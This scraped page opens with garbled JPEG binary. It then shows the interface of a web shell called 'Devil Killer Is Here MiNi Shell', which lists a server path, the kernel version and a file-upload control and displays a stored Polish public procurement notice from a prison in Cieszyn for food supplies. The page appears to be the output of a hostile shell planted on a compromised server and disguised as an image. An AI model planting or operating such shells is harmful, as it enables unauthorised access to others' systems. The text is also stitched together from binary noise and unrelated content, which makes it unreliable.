JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211214/0031443001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa różnych produktów spożywczych, owoców i warzyw przetworzonych część I i II i konserw. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KARNY W CIESZYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000319776</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesława Chrobrego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cieszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_cieszyn@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zakład Karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa różnych produktów spożywczych, owoców i warzyw przetworzonych część I i II i konserw. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4a74bcce-5cd0-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00314430</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00018135/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa różnych produktów spożywczych, owoców i warzyw przetworzonych, konserw </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej zp_cieszyn@sw.gov.pl, z https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Dyrektor Zakładu Karnego w Cieszynie, z siedzibą ul. B. Chrobrego 2, 43-400 Cieszyn tel. 33 851-32-00, e-mail: zk_cieszyn@sw.gov.pl;<br/>•	dane kontaktowe Inspektora Ochrony Danych Osobowych: e-mail iod_zk_cieszyn@sw.gov.pl, telefon tel. 33 828 05 37, fax. 22 848 85 81;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/Kw/OZ.2232.1.2021.AB2</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest sukcesywna dostawa różnych produktów spożywczych.<br/>L.p.	Nazwa	j.m.	Ilość	<br/>1.	Barszcz biały w proszku	kg	100,00	<br/>2.	Żurek w proszku	kg	160,00	<br/>3.	Zupa pieczarkowa w proszku	kg	110,00	<br/>4.	Zupa ogonowa w proszku	kg	80,00	<br/>5.	Majonez	kg	100,00	<br/>6.	Musztarda	kg	260,00	<br/>7.	Cukier kostka	kg	10,00	<br/>8.	Miód sztuczny	kg	50,00	<br/>9.	Pieprz czarny	kg	80,00	<br/>10.	Sól spożywcza	kg	3200,00	<br/>11.	Herbata granulowana	kg	400,00	<br/>12.	Herbata ekspresowa	kg	8,00	<br/>13.	Przyprawa w płynie „Maggi”	l	1600,00	<br/>14.	Bulion w proszku	kg	500,00	<br/>15.	Przyprawa „Jarzynka”	kg	100,00	<br/>16.	Ocet	l	500,00	<br/>17.	Kwasek cytrynowy	kg	3,00	<br/>18.	Pieprz ziołowy	kg	100,00	<br/>19.	Papryka sodka	kg	60,00	<br/>20.	Majeranek	kg	40,00	<br/>21.	Kminek	kg	15,00	<br/>22.	Liść laurowy	kg	28,00	<br/>23.	Ziele angielskie	kg	33,00	<br/>24.	Cynamon	kg	10,00	<br/>25.	Granulat sojowy	kg	500,00	<br/>26.	Kotlet sojowy	kg	340,00	<br/>27.	Kostka sojowa	kg	1000,00	<br/><br/>Barszcz biały w proszku - skład: mąka pszenna (46%), mąka żytnia (15%), mleko odtłuszczone w proszku (10%), cebula susz (3%), substancja wzmacniająca smak i zapach E 621, regulator kwasowości E 330, czosnek (2%), przyprawy.<br/><br/>Żurek w proszku - skład: mąka żytnia, mąka ryżowa, sól, tłuszcz roślinny, cukier, cebula, przyprawy, regulator kwasowości-kwasek cytrynowy, maltodekstryna, aromat.<br/><br/>Zupa pieczarkowa w proszku - skład: mąka pszenna, mąka ziemniaczana, maltodekstryna, tłuszcz roślinny utwardzony, cukier, laktoza, substancja wzmacniająca smak i zapach - glutaminian sodu, pieczarka płatek (1%), cebula suszona, białka mleka, suszony koncentrat pieczarkowy (0,5%), aromat, barwnik - karmel E 150 c.<br/><br/>Zupa ogonowa w proszku - skład: mąka pszenna, skrobia ziemniaczana, sól, proszek pomidorowy (6%), cukier, substancja wzmacniająca smak i zapach-glutaminian sodu, sojowy hydrolizat białkowy, warzywa suszone (1,5%), suszony ekstrakt drożdżowy, przyprawy, aromat, regulator kwasowości-kwasek cytrynowy, barwnik (karmel E 150 c), pietruszka liść susz.<br/><br/>Majonez - skład: olej roślinny, żółtka jaj, woda, ocet, cukier, musztarda, sól, 80% tłuszczu.<br/><br/>Musztarda - skład: gorczyca, woda, ocet, cukier, sól, przyprawy, aromaty smakowe.<br/><br/>Cukier kostka - opakowanie jednostkowe 1 kg.<br/><br/>Miód sztuczny - skład: cukier, woda, regulator kwasowości, kwasek cytrynowy, aromat miodowy.<br/><br/>Pieprz czarny - opakowanie jednostkowe od 0,01 kg do 0,10 kg.<br/><br/>Sól spożywcza - opakowanie jednostkowe do 25 kg.<br/><br/>Herbata granulowana - PN - ISO 3720.<br/><br/>Herbata ekspresowa - opakowanie jednostkowe od 100 szt. do 1000 szt.<br/><br/>Przyprawa w płynie „Maggi” - skład: woda, hydrolizatory białkowe, ekstrakty drożdżowe, sól, ocet, cukier, karmel, naturalne dodatki smakowe, substancje wzmacniające smak i zapach E 621, E 635.<br/><br/>Bulion w proszku - skład: sól, maltodekstryna, skrobia ziemniaczana, cukier, substancja wzmacniająca smak i zapach-glutaminian sodu, tłuszcz roślinny utwardzony, warzywa suszone 2,5%, barwnik E 100, aromat 0,3%.<br/><br/>Przyprawa „Jarzynka” - skład: sól, warzywa suszone (15%), cukier, substancja wzmacniająca smak i zapach-glutaminian sodu, skrobia kukurydziana, barwnik-ryboflawina.<br/><br/>Ocet - skład: ocet spirytusowy rektyfikowana 10%.<br/><br/>Kwasek cytrynowy - PN-81/A-79734.<br/><br/>Pieprz ziołowy - PN-A-86952.<br/><br/>Papryka sodka - PN-A-86955.<br/><br/>Majeranek - PN-A-86958.<br/><br/>Kminek - PN-A-86953<br/><br/>Liść laurowy - opakowanie jednostkowe od 0,5 kg do 2 kg.<br/><br/>Ziele angielskie - opakowanie jednostkowe od 0,5 kg do 1 kg.<br/><br/>Cynamon - opakowanie jednostkowe od 0,5 kg do 1 kg.<br/><br/>Granulat sojowy - opakowanie jednostkowe do 15 kg.<br/><br/>Kotlet sojowy - opakowanie jednostkowe do 20 kg.<br/><br/>Kostka sojowa - opakowanie jednostkowe do 15 kg.<br/><br/><br/><br/>Towar dostarczany będzie zamawiającemu do godz.1200 w dniu ustalonej dostawy według cen zgodnych z zawartą umową oraz ilości wskazanych przez Zamawiającego.<br/>Częstotliwość realizacji dostaw 1 raz w miesiącu. Minimalny okres przydatności do spożycia dla poszczególnych towarów powinien wynosić 60 dni od dnia dostawy. Wszystkie partie towaru winny być oznakowane / data produkcji, termin przydatności do spożycia, nazwa producenta /. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.<br/>Miejsce dostaw:<br/>1.	Zakład Karny w Cieszynie ul. Bolesława Chrobrego 2, 43-400 Cieszyn <br/>2.	Oddział Zewnętrzny w Bielsku-Białej Zakładu Karnego w Cieszynie ul. Juliusza Słowackiego 15A, 43-300 Bielsko-Biała. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331150-3 - Przetworzone jadalne części warzyw strączkowych</p> <p class="mb-0">15831200-4 - Cukier biały</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest sukcesywna dostawa warzyw i owoców przetworzonych część 1.<br/>L.p.	Nazwa	j.m.	Ilość	<br/>1.	Ogórek konserwowy	kg.	1330,00	<br/>2.	Sałatka warzywna	kg.	1100,00	<br/>3.	Sałatka szwedzka	kg.	840,00	<br/>4.	Koncentrat pomidorowy	kg.	2190,00	<br/>5.	Kapusta czerwona kwaszona	kg.	12800,00	<br/><br/>Ogórek konserwowy – pakowany w słoje o pojemności od 0,9 litra do 3,0 litra. Skład: ogórek świeży, woda, ocet, (substancja regulująca kwasowość - kwas octowy), cukier, sól, naturalne przyprawy (w tym gorczyca).<br/><br/>Sałatka warzywna - pakowana w słoje od 0,9 litra do 3,0 litra. Skład: kapusta biała, marchew, cebula, ogórek kwaszony, woda, ocet, substancja regulująca kwasowość-kwas octowy, cukier, przyprawy.<br/><br/>Sałatka szwedzka - pakowana w słoje od 0,9 litra do 3,0 litra. Skład: ogórek świeży krojony, woda, ocet, substancja regulująca kwasowość-kwas octowy, cukier, przyprawy.<br/><br/>Koncentrat pomidorowy - 30% pakowany w słoje o pojemności do 0,9 litra. Skład: koncentrat pomidorowy 30%, woda, sól.<br/><br/>Kapusta czerwona kwaszona - pakowana w słoje od 0,9 litra do 3,0 litra. Skład: kapusta czerwona, ocet, substancja regulująca kwasowość - kwas octowy, cukier, sól, woda, naturalne przyprawy.<br/><br/><br/>Towar dostarczany będzie zamawiającemu do godz.1200 w dniu ustalonej dostawy według cen zgodnych z zawartą umową oraz ilości wskazanych przez Zamawiającego.<br/>Częstotliwość realizacji dostaw 1 raz w miesiącu. Minimalny okres przydatności do spożycia dla poszczególnych towarów powinien wynosić 90 dni od dnia dostawy. Wszystkie partie towaru winny być oznakowane / data produkcji, termin przydatności do spożycia, nazwa producenta /. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.<br/><br/>Miejsce dostaw:<br/>1.	Zakład Karny w Cieszynie ul. Bolesława Chrobrego 2, 43-400 Cieszyn <br/>2.	Oddział Zewnętrzny w Bielsku-Białej Zakładu Karnego w Cieszynie ul. Juliusza Słowackiego 15A, 43-300 Bielsko-Biała. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15330000-0 - Przetworzone owoce i warzywa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest sukcesywna dostawa warzyw i owoców przetworzonych część 2.<br/>L.p.	Nazwa	j.m.	Ilość	<br/>1.	Leczo pieczarkowe	kg	2280,00	<br/>2.	Chrzan tarty	kg	130,00	<br/>3.	Groszek konserwowy	kg	470,00	<br/>4.	Marmolada	kg	1200,00	<br/>5.	Dżem	kg	990,00	<br/>6.	Dżem 25 g.	kg	30,00	<br/>7.	Fasola kolorowa	kg	620,00	<br/>8.	Fasola Jaś	kg	1500,00	<br/>9.	Groch	kg	1700,00	<br/>10.	Koperek suszony	kg	9,00	<br/><br/>Leczo pieczarkowe – pakowane w słoje lub pojemniki metalowe w ilości od 1 kg do 5 kg. Skład: pieczarki, woda, papryka, cebula, koncentrat pomidorowy, zagęstnik-skrobia modyfikowana, przyprawy.<br/><br/>Chrzan tarty - opakowany w słoju o pojemności do 1000 ml. Skład: przetarty korzeń chrzanu, woda, kwas cytrynowy, cukier, sól, przyprawy.<br/><br/>Groszek konserwowy - opakowanie metalowe 400 g. Skład: groszek zielony, woda, sól.<br/><br/>Marmolada - pakowana w pojemniki do 13 kg. Skład: przeciery owocowe, kwas cytrynowy, cukier, barwnik E 124, otrzymana ze 118 gram przecieru na 100 gram wyrobu gotowego. Łączna zawartość cukru 63 gram na 100 gram wyrobu gotowego. Konserwowana benzoesanem sodu E 211.<br/><br/>Dżem - pakowany w pojemniki do 13 kg. Skład: cukier, syrop glukozowy, owoce, substancja zagęszczająca-pektyna, regulator kwasowości-kwas cytrynowy, konserwant - sorbinian potasu, aromaty. Otrzymany z 35 gram owoców na 100 gram wyrobu gotowego. Łączna zawartość cukru 63 gram na 100 gram wyrobu gotowego.<br/><br/>Dżem 25 g - w opakowaniu jednostkowym 25 gram/sztuka. Skład: cukier, syrop glukozowy, owoce, substancja zagęszczająca - pektyna, regulator kwasowości - kwas cytrynowy, konserwant - sorbinian potasu, aromaty. Otrzymany z 35 gram owoców na 100 gram wyrobu gotowego. Łączna zawartość cukru 63 gram na 100 gram wyrobu gotowego.<br/><br/>Fasola kolorowa - pakowana w worki do 50 kg. Skład: zgodnie z PN-70/R-74010.<br/><br/>Fasola Jaś - pakowana w worki do 50 kg. Skład: zgodnie z PN-70/R-74010.<br/>Groch - pakowany w worki do 50 kg. Skład: zgodnie z PN-81/R-65032.<br/><br/>Koperek suszony - koper suszony w opakowaniu od 1 kg do 5 kg.<br/><br/><br/>Towar dostarczany będzie zamawiającemu do godz.1200 w dniu ustalonej dostawy według cen zgodnych z zawartą umową oraz ilości wskazanych przez Zamawiającego.<br/>Częstotliwość realizacji dostaw 1 raz w miesiącu. Minimalny okres przydatności do spożycia dla poszczególnych towarów powinien wynosić 90 dni od dnia dostawy. Wszystkie partie towaru winny być oznakowane / data produkcji, termin przydatności do spożycia, nazwa producenta /. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.<br/><br/>Miejsce dostaw:<br/>1.	Zakład Karny w Cieszynie ul. Bolesława Chrobrego 2, 43-400 Cieszyn <br/>2.	Oddział Zewnętrzny w Bielsku-Białej Zakładu Karnego w Cieszynie ul. Juliusza Słowackiego 15A, 43-300 Bielsko-Biała. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15330000-0 - Przetworzone owoce i warzywa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub 